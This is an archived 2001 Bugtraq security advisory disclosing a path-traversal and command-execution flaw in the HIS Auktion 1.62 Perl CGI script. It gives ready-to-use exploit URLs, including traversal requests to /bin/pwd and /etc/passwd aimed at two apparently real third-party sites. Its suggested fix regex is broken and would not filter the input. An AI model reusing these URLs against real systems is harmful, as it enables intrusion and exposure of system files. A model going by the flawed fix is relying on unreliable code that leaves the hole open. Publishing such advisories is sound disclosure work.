[19158] in bugtraq
HIS Auktion 1.62: "show files" vulnerability and remote command
daemon@ATHENA.MIT.EDU (UkR-XblP)
Mon Feb 12 17:42:36 2001
MIME-Version: 1.0
Content-Type: text/plain; charset="KOI8-R"
Content-Transfer-Encoding: 8bit
Message-ID: <web-16668020@backend2.aha.ru>
Date: Mon, 12 Feb 2001 17:22:46 +0300
Reply-To: UkR-XblP <cuctema@OK.RU>
From: UkR-XblP <cuctema@OK.RU>
To: BUGTRAQ@SECURITYFOCUS.COM
-----------UkR security team advisory #8------------
HIS Auktion 1.62: "show files" vulnerability and remote
command execute.
--------------------------------------------------
Name: HIS Auktion 1.62: "show files" vulnurability.
Date: 11.02.2001
Author: UkR-XblP
About: script "HIS Auktion 1.62" is a catalog of links CGI
script. The creators site http://www.his-software.de
Problem:
-------from auktion.pl-------
sub readfile {
local($filename)=$_0;
local(@array);
open(f,$filename);
----------------------------
$filename - is not filterred on symbols.
Exploit: http://www.victim.com/cgi-bin/auktion.pl?menue=path/to/any/file/or/command
FIX: to fix the bug yo need to add variable $filename check
to the script. For example: $filename=~s/(\[\]\;\:\/\$\!\$\&\`\\\(\)\{\}\")/\\$1/g;
Example:
http://www.zimmerauktion.de/cgi-bin/auktion.pl?menue=../../../../../../../../../../../../../bin/pwd
|
http://www.chess-international.de/cgi-bin/auktion.pl?menue=../../../../../../../../../../../../../etc/passwd
Get your free e-mail address at http://www.zmail.ru
